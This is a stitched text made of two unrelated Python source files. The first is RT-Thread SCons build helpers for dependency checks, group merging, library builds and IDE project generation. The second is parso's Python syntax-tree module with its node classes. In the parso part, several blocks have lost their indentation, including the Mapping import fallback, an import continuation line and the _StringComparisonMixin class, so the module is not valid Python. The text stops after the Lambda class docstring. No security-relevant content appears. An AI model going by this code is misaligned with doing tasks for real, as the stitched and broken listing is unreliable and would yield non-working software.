def GetDepend(depend):
    """Check *depend* (one macro name or a list of names) against the
    options parsed from rtconfig.h.

    For a single name: returns its value when defined non-empty, otherwise
    True (defined empty) or False (undefined/zero). For a list: True only
    when every non-empty entry is defined and non-zero.
    """
    # The previous body was a byte-for-byte copy of GetLocalDepend with
    # `options` fixed to the global namespace; delegate to avoid the
    # duplicated logic drifting apart.
    return GetLocalDepend(BuildOptions, depend)
def LocalOptions(config_filename):
    """Parse a local config header (e.g. wiced_config.h) and return its
    macro namespace as a dict-like object.
    """
    from SCons.Script import SCons

    # parse wiced_config.h to get used component
    PreProcessor = SCons.cpp.PreProcessor()
    # context manager replaces the manual open/read/close triple
    with open(config_filename, 'r') as f:
        contents = f.read()
    PreProcessor.process_contents(contents)
    local_options = PreProcessor.cpp_namespace

    return local_options
def GetLocalDepend(options, depend):
    """Evaluate *depend* against the macro namespace *options*.

    A single macro name returns its value when defined non-empty,
    otherwise True (defined but empty) or False (undefined or zero).
    A list of names is True only when every non-empty entry is defined
    and non-zero.
    """
    if type(depend) is str:
        # single macro: undefined or defined-as-0 means "disabled"
        if depend not in options or options[depend] == 0:
            return False
        if options[depend] != '':
            return options[depend]
        return True

    # list of macros: all non-empty entries must be enabled
    for entry in depend:
        if entry != '' and (entry not in options or options[entry] == 0):
            return False
    return True
def AddDepend(option):
    """Force-enable macro *option* in the global BuildOptions namespace."""
    BuildOptions[option] = 1
def MergeGroup(src_group, group):
    """Merge *group*'s sources and build flags into *src_group* in place.

    Both group dicts must contain a 'src' entry. For every other known
    build key, the values are concatenated when the key exists in both
    groups, or copied from *group* when *src_group* lacks it.
    Returns None.
    """
    # Keys merged by simple concatenation (string flags or path lists);
    # replaces eleven copy-pasted if/else clauses.
    _MERGE_KEYS = (
        'CCFLAGS', 'CPPPATH', 'CPPDEFINES', 'ASFLAGS',
        # local (per-group) variants of the flags above
        'LOCAL_CCFLAGS', 'LOCAL_CPPPATH', 'LOCAL_CPPDEFINES',
        'LINKFLAGS', 'LIBS', 'LIBPATH', 'LOCAL_ASFLAGS',
    )

    src_group['src'] = src_group['src'] + group['src']
    for key in _MERGE_KEYS:
        if key in group:
            if key in src_group:
                src_group[key] = src_group[key] + group[key]
            else:
                src_group[key] = group[key]
def DefineGroup(name, src, depend, **parameters):
    """Define a named build group (component) with sources and flags.

    Skips the group (returns []) when *depend* is not satisfied. Global
    flags in *parameters* (CCFLAGS/CPPPATH/...) are appended to the global
    Env; LOCAL_* flags stay group-private. The group is merged into an
    existing Projects entry of the same name, or appended as a new one.

    :param name: group name (also the library name for --buildlib).
    :param src: list of source files, or an SCons node list.
    :param depend: dependency spec understood by GetDepend().
    :param parameters: build flags and options (CPPPATH, LIBRARY, ...).
    :return: the group's SCons objects (or sources when not a LIBRARY).
    """
    global Env
    if not GetDepend(depend):
        return []

    # find exist group and get path of group
    group_path = ''
    for g in Projects:
        if g['name'] == name:
            group_path = g['path']

    if group_path == '':
        group_path = GetCurrentDir()

    group = parameters
    group['name'] = name
    group['path'] = group_path
    if type(src) == type([]):
        # convert plain path strings to SCons File nodes
        group['src'] = File(src)
    else:
        group['src'] = src

    if 'CCFLAGS' in group:
        Env.AppendUnique(CCFLAGS = group['CCFLAGS'])
    if 'CPPPATH' in group:
        # normalize include paths to absolute before publishing them globally
        paths = []
        for item in group['CPPPATH']:
            paths.append(os.path.abspath(item))
        group['CPPPATH'] = paths
        Env.AppendUnique(CPPPATH = group['CPPPATH'])
    if 'CPPDEFINES' in group:
        Env.AppendUnique(CPPDEFINES = group['CPPDEFINES'])
    if 'LINKFLAGS' in group:
        Env.AppendUnique(LINKFLAGS = group['LINKFLAGS'])
    if 'ASFLAGS' in group:
        Env.AppendUnique(ASFLAGS = group['ASFLAGS'])
    if 'LOCAL_CPPPATH' in group:
        # LOCAL_* flags are kept on the group only (see DoBuilding)
        paths = []
        for item in group['LOCAL_CPPPATH']:
            paths.append(os.path.abspath(item))
        group['LOCAL_CPPPATH'] = paths

    import rtconfig
    if rtconfig.PLATFORM == 'gcc':
        if 'CCFLAGS' in group:
            group['CCFLAGS'] = utils.GCCC99Patch(group['CCFLAGS'])
        if 'LOCAL_CCFLAGS' in group:
            group['LOCAL_CCFLAGS'] = utils.GCCC99Patch(group['LOCAL_CCFLAGS'])

    # check whether to clean up library
    if GetOption('cleanlib') and os.path.exists(os.path.join(group['path'], GroupLibFullName(name, Env))):
        if group['src'] != []:
            print ('Remove library:'+ GroupLibFullName(name, Env))
            fn = os.path.join(group['path'], GroupLibFullName(name, Env))
            if os.path.exists(fn):
                os.unlink(fn)

    if 'LIBS' in group:
        Env.AppendUnique(LIBS = group['LIBS'])
    if 'LIBPATH' in group:
        Env.AppendUnique(LIBPATH = group['LIBPATH'])

    # check whether to build group library
    if 'LIBRARY' in group:
        objs = Env.Library(name, group['src'])
    else:
        # only add source
        objs = group['src']

    # merge group
    for g in Projects:
        if g['name'] == name:
            # merge to this group
            MergeGroup(g, group)
            return objs

    # add a new group
    Projects.append(group)

    return objs
def GetCurrentDir():
    """Return the absolute directory of the SConscript currently being
    processed (resolved through its repository file node).
    """
    conscript = File('SConscript')
    fn = conscript.rfile()
    # the unused `name = fn.name` local was dropped
    return os.path.dirname(fn.abspath)
# Callbacks registered via RegisterPreBuildingAction, run by PreBuilding().
PREBUILDING = []

def RegisterPreBuildingAction(act):
    """Register a callable to run before the build starts."""
    global PREBUILDING
    assert callable(act), 'Could only register callable objects. %s received' % repr(act)
    PREBUILDING.append(act)

def PreBuilding():
    """Invoke all registered pre-building callbacks in registration order."""
    global PREBUILDING
    for a in PREBUILDING:
        a()
def GroupLibName(name, env):
    """Return the toolchain-specific library base name for group *name*
    ('_rvds' suffix for armcc, '_gcc' for gcc, none otherwise).
    """
    import rtconfig
    suffixes = {'armcc': '_rvds', 'gcc': '_gcc'}
    return name + suffixes.get(rtconfig.PLATFORM, '')
def GroupLibFullName(name, env):
    """Return the full library file name (prefix + toolchain name + suffix)."""
    return env['LIBPREFIX'] + GroupLibName(name, env) + env['LIBSUFFIX']
def BuildLibInstallAction(target, source, env):
    """SCons action: copy the library built with --buildlib back into the
    owning group's source directory.
    """
    lib_name = GetOption('buildlib')
    for Group in Projects:
        if Group['name'] == lib_name:
            lib_name = GroupLibFullName(Group['name'], env)
            dst_name = os.path.join(Group['path'], lib_name)
            print ('Copy '+lib_name+' => ' +dst_name)
            do_copy_file(lib_name, dst_name)
            break
def DoBuilding(target, objects):
    """Build *target* from *objects*, honoring the --buildlib option and
    per-group LOCAL_* compile flags.

    Groups carrying LOCAL_* flags have their default objects replaced by
    objects compiled with Env's flags plus the group-local ones.
    """

    # merge all objects into one flat list
    def one_list(l):
        lst = []
        for item in l:
            if type(item) == type([]):
                lst += one_list(item)
            else:
                lst.append(item)
        return lst

    # handle local group: compile its sources with group-local flags
    # appended to the global ones; returns True when it applied
    def local_group(group, objects):
        if 'LOCAL_CCFLAGS' in group or 'LOCAL_CPPPATH' in group or 'LOCAL_CPPDEFINES' in group or 'LOCAL_ASFLAGS' in group:
            CCFLAGS = Env.get('CCFLAGS', '') + group.get('LOCAL_CCFLAGS', '')
            CPPPATH = Env.get('CPPPATH', ['']) + group.get('LOCAL_CPPPATH', [''])
            CPPDEFINES = Env.get('CPPDEFINES', ['']) + group.get('LOCAL_CPPDEFINES', [''])
            ASFLAGS = Env.get('ASFLAGS', '') + group.get('LOCAL_ASFLAGS', '')

            for source in group['src']:
                objects.append(Env.Object(source, CCFLAGS = CCFLAGS, ASFLAGS = ASFLAGS,
                    CPPPATH = CPPPATH, CPPDEFINES = CPPDEFINES))

            return True

        return False

    objects = one_list(objects)

    program = None
    # check whether special buildlib option
    lib_name = GetOption('buildlib')
    if lib_name:
        objects = [] # remove all of objects
        # build library with special component
        for Group in Projects:
            if Group['name'] == lib_name:
                lib_name = GroupLibName(Group['name'], Env)
                if not local_group(Group, objects):
                    objects = Env.Object(Group['src'])

                program = Env.Library(lib_name, objects)

                # add library copy action
                Env.BuildLib(lib_name, program)

                break
    else:
        # remove source files with local flags setting.
        # FIX: 'LOCAL_ASFLAGS' was missing from this condition although
        # local_group() re-adds such sources, so a group carrying only
        # LOCAL_ASFLAGS ended up with duplicated objects.
        for group in Projects:
            if 'LOCAL_CCFLAGS' in group or 'LOCAL_CPPPATH' in group or 'LOCAL_CPPDEFINES' in group or 'LOCAL_ASFLAGS' in group:
                for source in group['src']:
                    for obj in objects:
                        if source.abspath == obj.abspath or (len(obj.sources) > 0 and source.abspath == obj.sources[0].abspath):
                            objects.remove(obj)

        # re-add the source files to the objects
        for group in Projects:
            local_group(group, objects)

        program = Env.Program(target, objects)

    EndBuilding(target, program)
def GenTargetProject(program = None):
    """Emit an IDE/build-system project file for the --target option."""
    target = GetOption('target')

    if target == 'mdk':
        from keil import MDKProject
        from keil import MDK4Project
        from keil import MDK5Project

        # pick the generator matching whichever Keil template file exists
        if os.path.isfile('template.Uv2'):
            MDKProject('project.Uv2', Projects)
        elif os.path.isfile('template.uvproj'):
            MDK4Project('project.uvproj', Projects)
        elif os.path.isfile('template.uvprojx'):
            MDK5Project('project.uvprojx', Projects)
        else:
            print ('No template project file found.')
    elif target == 'mdk4':
        from keil import MDK4Project
        MDK4Project('project.uvproj', Projects)
    elif target == 'mdk5':
        from keil import MDK5Project
        MDK5Project('project.uvprojx', Projects)
    elif target == 'iar':
        from iar import IARProject
        IARProject('project.ewp', Projects)
    elif target == 'vs':
        from vs import VSProject
        VSProject('project.vcproj', Projects, program)
    elif target == 'vs2012':
        from vs2012 import VS2012Project
        VS2012Project('project.vcxproj', Projects, program)
    elif target == 'cb':
        from codeblocks import CBProject
        CBProject('project.cbp', Projects, program)
    elif target == 'ua':
        from ua import PrepareUA
        PrepareUA(Projects, Rtt_Root, str(Dir('#')))
    elif target == 'vsc':
        from vsc import GenerateVSCode
        GenerateVSCode(Env)
    elif target == 'cdk':
        from cdk import CDKProject
        CDKProject('project.cdkproj', Projects)
    elif target == 'ses':
        from ses import SESProject
        SESProject(Env)
    elif target == 'makefile':
        from makefile import TargetMakefile
        TargetMakefile(Env)
    elif target == 'eclipse':
        from eclipse import TargetEclipse
        TargetEclipse(Env, GetOption('reset-project-config'), GetOption('project-name'))
def EndBuilding(target, program = None):
    """Finish the build: attach post actions and clean files, and handle
    project generation (--target), distribution (--dist*) and cscope.

    :param target: the SCons build target.
    :param program: the built program node(s), if any.
    """
    import rtconfig

    need_exit = False

    Env['target']  = program
    Env['project'] = Projects

    if hasattr(rtconfig, 'BSP_LIBRARY_TYPE'):
        Env['bsp_lib_type'] = rtconfig.BSP_LIBRARY_TYPE

    if hasattr(rtconfig, 'dist_handle'):
        Env['dist_handle'] = rtconfig.dist_handle

    Env.AddPostAction(target, rtconfig.POST_ACTION)
    # Add addition clean files
    Clean(target, 'cconfig.h')
    Clean(target, 'rtua.py')
    Clean(target, 'rtua.pyc')

    if GetOption('target'):
        GenTargetProject(program)

    BSP_ROOT = Dir('#').abspath
    if GetOption('make-dist') and program != None:
        from mkdist import MkDist
        MkDist(program, BSP_ROOT, Rtt_Root, Env)
    if GetOption('make-dist-strip') and program != None:
        from mkdist import MkDist_Strip
        MkDist_Strip(program, BSP_ROOT, Rtt_Root, Env)
        need_exit = True
    if GetOption('make-dist-ide') and program != None:
        from mkdist import MkDist
        project_path = GetOption('project-path')
        project_name = GetOption('project-name')

        # both options are mandatory for an IDE distribution
        if not isinstance(project_path, str) or len(project_path) == 0 :
            print("\nwarning : --project-path=your_project_path parameter is required.")
            print("\nstop!")
            exit(0)
        if not isinstance(project_name, str) or len(project_name) == 0:
            print("\nwarning : --project-name=your_project_name parameter is required.")
            print("\nstop!")
            exit(0)

        rtt_ide = {'project_path' : project_path, 'project_name' : project_name}
        MkDist(program, BSP_ROOT, Rtt_Root, Env, rtt_ide)
        need_exit = True
    if GetOption('cscope'):
        from cscope import CscopeDatabase
        CscopeDatabase(Projects)

    if not GetOption('help') and not GetOption('target'):
        if not os.path.exists(rtconfig.EXEC_PATH):
            print ("Error: the toolchain path (" + rtconfig.EXEC_PATH + ") is not exist, please check 'EXEC_PATH' in path or rtconfig.py.")
            need_exit = True

    if need_exit:
        exit(0)
def SrcRemove(src, remove):
    """Remove entries from the source list *src* in place.

    :param src: list of sources (path strings or SCons File nodes).
    :param remove: one path, or a list of paths, to drop. Absolute paths
        are compared relative to the current SConscript directory.
    """
    if not src:
        return

    def _normalize(path):
        # compare everything as a normalized path relative to the
        # current SConscript directory
        if os.path.isabs(path):
            path = os.path.relpath(path, GetCurrentDir())
        return os.path.normpath(path)

    # Build the removal set once (the original re-normalized every source
    # for every remove entry, and could double-remove on duplicate
    # entries, raising ValueError).
    if type(remove) == type('str'):
        targets = set([_normalize(remove)])
    else:
        targets = set(_normalize(str(item)) for item in remove)

    # iterate over a copy so in-place removal is safe
    for item in src[:]:
        if type(item) == type('str'):
            item_str = item
        else:
            item_str = item.rstr()
        if _normalize(item_str) in targets:
            src.remove(item)
def GetVersion():
    """Parse include/rtdef.h and return the RT-Thread version string
    ('major.minor.revision', or '0.minor.sub' when RT_REVISION is absent).
    """
    import SCons.cpp

    rtdef = os.path.join(Rtt_Root, 'include', 'rtdef.h')

    # parse rtdef.h to get RT-Thread version
    prepcessor = PatchedPreProcessor()
    with open(rtdef, 'r') as f:
        contents = f.read()
    prepcessor.process_contents(contents)
    def_ns = prepcessor.cpp_namespace

    def _num(macro):
        # Keep only digits/dots before converting. On Python 3 filter()
        # returns an iterator, so the original int(filter(...)) raised
        # TypeError; join it back into a string first.
        return int(''.join(filter(lambda ch: ch in '0123456789.', macro)))

    version = _num(def_ns['RT_VERSION'])
    subversion = _num(def_ns['RT_SUBVERSION'])

    if 'RT_REVISION' in def_ns:
        revision = _num(def_ns['RT_REVISION'])
        return '%d.%d.%d' % (version, subversion, revision)

    return '0.%d.%d' % (version, subversion)
def GlobSubDir(sub_dir, ext_name):
    """Glob *ext_name* (e.g. '*.c') in *sub_dir* and all its
    subdirectories, returning paths relative to *sub_dir*.
    """
    import os
    import glob

    def _collect(directory):
        # matches in this directory first, then each child directory
        matches = glob.glob(os.path.join(directory, ext_name))
        for entry in os.listdir(directory):
            child = os.path.join(directory, entry)
            if os.path.isdir(child):
                matches += _collect(child)
        return matches

    return [os.path.relpath(found, sub_dir) for found in _collect(sub_dir)]
def PackageSConscript(package):
    """Build *package* through the tools/package helper and return its result."""
    from package import BuildPackage

    return BuildPackage(package)
|
|
"""
This is the syntax tree for Python 3 syntaxes. The classes represent
syntax elements like functions and imports.
All of the nodes can be traced back to the `Python grammar file
<https://docs.python.org/3/reference/grammar.html>`_. If you want to know how
a tree is structured, just analyse that file (for each Python version it's a
bit different).
There's a lot of logic here that makes it easier for Jedi (and other libraries)
to deal with a Python syntax tree.
By using :py:meth:`parso.tree.NodeOrLeaf.get_code` on a module, you can get
back the 1-to-1 representation of the input given to the parser. This is
important if you want to refactor a parser tree.
>>> from parso import parse
>>> parser = parse('import os')
>>> module = parser.get_root_node()
>>> module
<Module: @1-1>
Any subclasses of :class:`Scope`, including :class:`Module` has an attribute
:attr:`iter_imports <Scope.iter_imports>`:
>>> list(module.iter_imports())
[<ImportName: import os@1,0>]
Changes to the Python Grammar
-----------------------------
A few things have changed when looking at Python grammar files:
- :class:`Param` does not exist in Python grammar files. It is essentially a
part of a ``parameters`` node. |parso| splits it up to make it easier to
analyse parameters. However this just makes it easier to deal with the syntax
tree, it doesn't actually change the valid syntax.
- A few nodes like `lambdef` and `lambdef_nocond` have been merged in the
  syntax tree to make it easier to deal with them.
Parser Tree Classes
-------------------
"""
import re
try:
from collections.abc import Mapping
except ImportError:
from collections import Mapping
from typing import Tuple
from parso.tree import Node, BaseNode, Leaf, ErrorNode, ErrorLeaf, \
search_ancestor
from parso.python.prefix import split_prefix
from parso.utils import split_lines
# Node types that contain nested statements but do not open a new scope.
_FLOW_CONTAINERS = set(['if_stmt', 'while_stmt', 'for_stmt', 'try_stmt',
                        'with_stmt', 'async_stmt', 'suite'])
# Containers searched when collecting return statements.
_RETURN_STMT_CONTAINERS = set(['suite', 'simple_stmt']) | _FLOW_CONTAINERS

# Containers searched when collecting nested funcdef/classdef/import nodes
# (see Scope._search_in_scope).
_FUNC_CONTAINERS = set(
    ['suite', 'simple_stmt', 'decorated', 'async_funcdef']
) | _FLOW_CONTAINERS

# Node types that can bind a name (see Name.get_definition).
_GET_DEFINITION_TYPES = set([
    'expr_stmt', 'sync_comp_for', 'with_stmt', 'for_stmt', 'import_name',
    'import_from', 'param', 'del_stmt', 'namedexpr_test',
])
# The two import statement node types.
_IMPORTS = set(['import_name', 'import_from'])
class DocstringMixin:
    """Mixin adding docstring lookup for modules, classes, functions and
    expression statements."""
    __slots__ = ()

    def get_doc_node(self):
        """
        Returns the string leaf of a docstring. e.g. ``r'''foo'''``.
        """
        if self.type == 'file_input':
            # module docstring: the very first child statement
            node = self.children[0]
        elif self.type in ('funcdef', 'classdef'):
            # first statement after the ':' of the def/class header
            node = self.children[self.children.index(':') + 1]
            if node.type == 'suite':  # Normally a suite
                node = node.children[1]  # -> NEWLINE stmt
        else:  # ExprStmt
            # the docstring is the statement directly preceding this one
            # in the surrounding block
            simple_stmt = self.parent
            c = simple_stmt.parent.children
            index = c.index(simple_stmt)
            if not index:
                return None
            node = c[index - 1]

        if node.type == 'simple_stmt':
            node = node.children[0]
        if node.type == 'string':
            return node
        return None
class PythonMixin:
    """
    Some Python specific utilities.
    """
    __slots__ = ()

    def get_name_of_position(self, position):
        """
        Given a (line, column) tuple, returns a :py:class:`Name` or ``None`` if
        there is no name at that position.
        """
        for child in self.children:
            if not isinstance(child, Leaf):
                # inner node: search its subtree
                found = child.get_name_of_position(position)
                if found is not None:
                    return found
            elif child.type == 'name' and child.start_pos <= position <= child.end_pos:
                return child
        return None
class PythonLeaf(PythonMixin, Leaf):
    """Base class for all leaves of the Python parser tree."""
    __slots__ = ()

    def _split_prefix(self):
        # split the leaf's whitespace/comment prefix into typed parts
        return split_prefix(self, self.get_start_pos_of_prefix())

    def get_start_pos_of_prefix(self):
        """
        Basically calls :py:meth:`parso.tree.NodeOrLeaf.get_start_pos_of_prefix`.
        """
        # TODO it is really ugly that we have to override it. Maybe change
        # indent error leafs somehow? No idea how, though.
        previous_leaf = self.get_previous_leaf()
        if previous_leaf is not None and previous_leaf.type == 'error_leaf' \
                and previous_leaf.token_type in ('INDENT', 'DEDENT', 'ERROR_DEDENT'):
            # skip synthetic indentation error leaves; they carry no text
            previous_leaf = previous_leaf.get_previous_leaf()

        if previous_leaf is None:  # It's the first leaf.
            lines = split_lines(self.prefix)
            # + 1 is needed because split_lines always returns at least [''].
            return self.line - len(lines) + 1, 0  # It's the first leaf.
        return previous_leaf.end_pos
class _LeafWithoutNewlines(PythonLeaf):
    """
    Simply here to optimize performance.
    """
    __slots__ = ()

    @property
    def end_pos(self) -> Tuple[int, int]:
        # no newlines in the value, so the leaf ends on its start line
        return self.line, self.column + len(self.value)
# Python base classes
class PythonBaseNode(PythonMixin, BaseNode):
    """Base class for all inner (non-leaf) Python nodes."""
    __slots__ = ()


class PythonNode(PythonMixin, Node):
    """A typed inner node of the Python parser tree."""
    __slots__ = ()


class PythonErrorNode(PythonMixin, ErrorNode):
    """Inner node covering a region that could not be parsed."""
    __slots__ = ()


class PythonErrorLeaf(ErrorLeaf, PythonLeaf):
    """Leaf covering a token that could not be parsed."""
    __slots__ = ()
class EndMarker(_LeafWithoutNewlines):
    """Leaf marking the end of the parsed input."""
    __slots__ = ()
    type = 'endmarker'

    def __repr__(self):
        return "<{}: prefix={!r} end_pos={}>".format(
            type(self).__name__, self.prefix, self.end_pos
        )
class Newline(PythonLeaf):
    """Contains NEWLINE and ENDMARKER tokens."""
    __slots__ = ()
    type = 'newline'

    def __repr__(self):
        return "<{}: {!r}>".format(type(self).__name__, self.value)
class Name(_LeafWithoutNewlines):
    """
    A string. Sometimes it is important to know if the string belongs to a name
    or not.
    """
    type = 'name'
    __slots__ = ()

    def __repr__(self):
        return "<%s: %s@%s,%s>" % (type(self).__name__, self.value,
                                   self.line, self.column)

    def is_definition(self, include_setitem=False):
        """
        Returns True if the name is being defined.
        """
        return self.get_definition(include_setitem=include_setitem) is not None

    def get_definition(self, import_name_always=False, include_setitem=False):
        """
        Returns None if there's no definition for a name.

        :param import_name_always: Specifies if an import name is always a
            definition. Normally foo in `from foo import bar` is not a
            definition.
        """
        node = self.parent
        type_ = node.type

        # a funcdef/classdef defines exactly its own name child
        if type_ in ('funcdef', 'classdef'):
            if self == node.name:
                return node
            return None

        if type_ == 'except_clause':
            # only `except ... as name` binds a name
            if self.get_previous_sibling() == 'as':
                return node.parent  # The try_stmt.
            return None

        # otherwise walk upwards until a defining statement (or a suite,
        # which ends the search) is found
        while node is not None:
            if node.type == 'suite':
                return None
            if node.type in _GET_DEFINITION_TYPES:
                if self in node.get_defined_names(include_setitem):
                    return node
                if import_name_always and node.type in _IMPORTS:
                    return node
                return None
            node = node.parent
        return None
class Literal(PythonLeaf):
    """Common base class for literal leaves (numbers and strings)."""
    __slots__ = ()


class Number(Literal):
    type = 'number'
    __slots__ = ()
class String(Literal):
    type = 'string'
    __slots__ = ()

    @property
    def string_prefix(self):
        # the word characters before the opening quote, e.g. 'rb' in rb'x'
        return re.match(r'\w*(?=[\'"])', self.value).group(0)

    def _get_payload(self):
        # strip the prefix and the surrounding (single or triple) quotes,
        # returning only the string's contents
        match = re.search(
            r'''('{3}|"{3}|'|")(.*)$''',
            self.value,
            flags=re.DOTALL
        )
        return match.group(2)[:-len(match.group(1))]
class FStringString(PythonLeaf):
    """
    f-strings contain f-string expressions and normal python strings. These are
    the string parts of f-strings.
    """
    type = 'fstring_string'
    __slots__ = ()


class FStringStart(PythonLeaf):
    """
    f-strings contain f-string expressions and normal python strings. These are
    the start tokens of f-strings (e.g. ``f'``).
    """
    type = 'fstring_start'
    __slots__ = ()


class FStringEnd(PythonLeaf):
    """
    f-strings contain f-string expressions and normal python strings. These are
    the end tokens of f-strings (the closing quote).
    """
    type = 'fstring_end'
    __slots__ = ()
class _StringComparisonMixin:
def __eq__(self, other):
"""
Make comparisons with strings easy.
Improves the readability of the parser.
"""
if isinstance(other, str):
return self.value == other
return self is other
def __hash__(self):
return hash(self.value)
class Operator(_LeafWithoutNewlines, _StringComparisonMixin):
    """Leaf for operator tokens; compares equal to its string value."""
    type = 'operator'
    __slots__ = ()


class Keyword(_LeafWithoutNewlines, _StringComparisonMixin):
    """Leaf for keyword tokens; compares equal to its string value."""
    type = 'keyword'
    __slots__ = ()
class Scope(PythonBaseNode, DocstringMixin):
    """
    Super class for the parser tree, which represents the state of a python
    text file.
    A Scope is either a function, class or lambda.
    """
    __slots__ = ()

    def __init__(self, children):
        super().__init__(children)

    def iter_funcdefs(self):
        """
        Returns a generator of `funcdef` nodes.
        """
        return self._search_in_scope('funcdef')

    def iter_classdefs(self):
        """
        Returns a generator of `classdef` nodes.
        """
        return self._search_in_scope('classdef')

    def iter_imports(self):
        """
        Returns a generator of `import_name` and `import_from` nodes.
        """
        return self._search_in_scope('import_name', 'import_from')

    def _search_in_scope(self, *names):
        # recursively yield children of the given types, descending only
        # into containers that do not open a new scope themselves
        def scan(children):
            for element in children:
                if element.type in names:
                    yield element
                if element.type in _FUNC_CONTAINERS:
                    yield from scan(element.children)

        return scan(self.children)

    def get_suite(self):
        """
        Returns the part that is executed by the function.
        """
        return self.children[-1]

    def __repr__(self):
        try:
            name = self.name.value
        except AttributeError:
            # anonymous scopes (lambdas, modules) have no name leaf
            name = ''

        return "<%s: %s@%s-%s>" % (type(self).__name__, name,
                                   self.start_pos[0], self.end_pos[0])
class Module(Scope):
    """
    The top scope, which is always a module.
    Depending on the underlying parser this may be a full module or just a part
    of a module.
    """
    __slots__ = ('_used_names',)
    type = 'file_input'

    def __init__(self, children):
        super().__init__(children)
        # lazily-filled cache for get_used_names()
        self._used_names = None

    def _iter_future_import_names(self):
        """
        :return: A list of future import names.
        :rtype: list of str
        """
        # In Python it's not allowed to use future imports after the first
        # actual (non-future) statement. However this is not a linter here,
        # just return all future imports. If people want to scan for issues
        # they should use the API.
        for imp in self.iter_imports():
            if imp.type == 'import_from' and imp.level == 0:
                for path in imp.get_paths():
                    names = [name.value for name in path]
                    if len(names) == 2 and names[0] == '__future__':
                        yield names[1]

    def get_used_names(self):
        """
        Returns all the :class:`Name` leafs that exist in this module. This
        includes both definitions and references of names.
        """
        if self._used_names is None:
            # Don't directly use self._used_names to eliminate a lookup.
            dct = {}

            def recurse(node):
                try:
                    children = node.children
                except AttributeError:
                    # leaf: record it if it's a name
                    if node.type == 'name':
                        arr = dct.setdefault(node.value, [])
                        arr.append(node)
                else:
                    for child in children:
                        recurse(child)

            recurse(self)
            self._used_names = UsedNamesMapping(dct)
        return self._used_names
class Decorator(PythonBaseNode):
    """A single ``@...`` decorator line preceding a class or function."""
    type = 'decorator'
    __slots__ = ()
class ClassOrFunc(Scope):
    """Shared behaviour of ``classdef`` and ``funcdef`` nodes."""
    __slots__ = ()

    @property
    def name(self):
        """The ``Name`` leaf that holds the class or function name."""
        return self.children[1]

    def get_decorators(self):
        """
        Return the list of :class:`Decorator` nodes applied to this
        definition; empty when it is undecorated.
        """
        node = self.parent
        # ``async def`` wraps the funcdef once more before the decoration.
        if node.type == 'async_funcdef':
            node = node.parent
        if node.type != 'decorated':
            return []
        first = node.children[0]
        if first.type == 'decorators':
            return first.children
        return node.children[:1]
class Class(ClassOrFunc):
    """
    Used to store the parsed contents of a python class.
    """
    type = 'classdef'
    __slots__ = ()

    def __init__(self, children):
        super().__init__(children)

    def get_super_arglist(self):
        """
        Return the ``arglist`` node listing the base classes, or ``None``
        when the class has no parentheses — or empty ones.
        """
        if self.children[2] != '(':    # no parentheses at all
            return None
        if self.children[3] == ')':    # empty parentheses
            return None
        return self.children[3]
def _create_params(parent, argslist_list):
    """
    Replace the raw argument list with a list of ``Param`` objects.

    `argslist_list` holds the items between the parameter brackets (at most
    one item, which may be an argslist node).  This function modifies the
    parser structure: it generates `Param` objects from the normal ast.
    Those param objects do not exist in a normal ast, but they make
    evaluation of the ast tree much easier.
    """
    try:
        first = argslist_list[0]
    except IndexError:
        # Empty parameter brackets: no params at all.
        return []

    if first.type in ('name', 'fpdef'):
        # A single plain parameter.
        return [Param([first], parent)]
    elif first == '*':
        # A bare `*` (keyword-only marker) with nothing else.
        return [first]
    else:  # argslist is a `typedargslist` or a `varargslist`.
        if first.type == 'tfpdef':
            children = [first]
        else:
            children = first.children
        new_children = []
        start = 0
        # Start with offset 1, because the end is higher.
        # The sentinel None flushes the final (comma-less) parameter group.
        for end, child in enumerate(children + [None], 1):
            if child is None or child == ',':
                param_children = children[start:end]
                if param_children:  # Could as well be comma and then end.
                    # Bare `*` / `/` markers are kept as-is (re-parented),
                    # everything else becomes a Param node.
                    if param_children[0] == '*' \
                            and (len(param_children) == 1
                                 or param_children[1] == ',') \
                            or param_children[0] == '/':
                        for p in param_children:
                            p.parent = parent
                        new_children += param_children
                    else:
                        new_children.append(Param(param_children, parent))
                    start = end
        return new_children
class Function(ClassOrFunc):
    """
    Used to store the parsed contents of a python function.

    Children::

        0. <Keyword: def>
        1. <Name>
        2. parameter list (including open-paren and close-paren <Operator>s)
        3. or 5. <Operator: :>
        4. or 6. Node() representing function body
        3. -> (if annotation is also present)
        4. annotation (if present)
    """
    type = 'funcdef'

    def __init__(self, children):
        super().__init__(children)
        parameters = self.children[2]  # After `def foo`
        # Rewrite the raw argument nodes into Param objects in place.
        parameters.children[1:-1] = _create_params(parameters, parameters.children[1:-1])

    def _get_param_nodes(self):
        # All children of the parameter list, including `(`, `)`, `*`, `/`.
        return self.children[2].children

    def get_params(self):
        """
        Returns a list of `Param()` nodes (markers and parens filtered out).
        """
        return [p for p in self._get_param_nodes() if p.type == 'param']

    @property
    def name(self):
        """The ``Name`` leaf holding the function name."""
        return self.children[1]  # First token after `def`

    def iter_yield_exprs(self):
        """
        Returns a generator of `yield_expr` nodes in this function's body,
        without descending into nested functions, classes or lambdas.
        """
        def scan(children):
            for element in children:
                if element.type in ('classdef', 'funcdef', 'lambdef'):
                    continue
                try:
                    nested_children = element.children
                except AttributeError:
                    # Leaf: a bare `yield` keyword may or may not be wrapped
                    # in a `yield_expr` node; prefer yielding the wrapper.
                    if element.value == 'yield':
                        if element.parent.type == 'yield_expr':
                            yield element.parent
                        else:
                            yield element
                else:
                    yield from scan(nested_children)
        return scan(self.children)

    def iter_return_stmts(self):
        """
        Returns a generator of `return_stmt` (or bare `return` keyword) nodes.
        """
        def scan(children):
            for element in children:
                if element.type == 'return_stmt' \
                        or element.type == 'keyword' and element.value == 'return':
                    yield element
                if element.type in _RETURN_STMT_CONTAINERS:
                    yield from scan(element.children)
        return scan(self.children)

    def iter_raise_stmts(self):
        """
        Returns a generator of `raise_stmt`. Includes raise statements inside try-except blocks
        """
        def scan(children):
            for element in children:
                if element.type == 'raise_stmt' \
                        or element.type == 'keyword' and element.value == 'raise':
                    yield element
                if element.type in _RETURN_STMT_CONTAINERS:
                    yield from scan(element.children)
        return scan(self.children)

    def is_generator(self):
        """
        :return bool: True when the body contains at least one yield.
        """
        return next(self.iter_yield_exprs(), None) is not None

    @property
    def annotation(self):
        """
        Returns the test node after `->` or `None` if there is no annotation.
        """
        try:
            if self.children[3] == "->":
                return self.children[4]
            assert self.children[3] == ":"
            return None
        except IndexError:
            # Fewer children than expected: no annotation present.
            return None
class Lambda(Function):
    """
    Lambdas are basically trimmed functions, so they share the
    :class:`Function` interface.

    Children::

        0. <Keyword: lambda>
        *. <Param x> for each argument x
        -2. <Operator: :>
        -1. Node() representing body
    """
    type = 'lambdef'
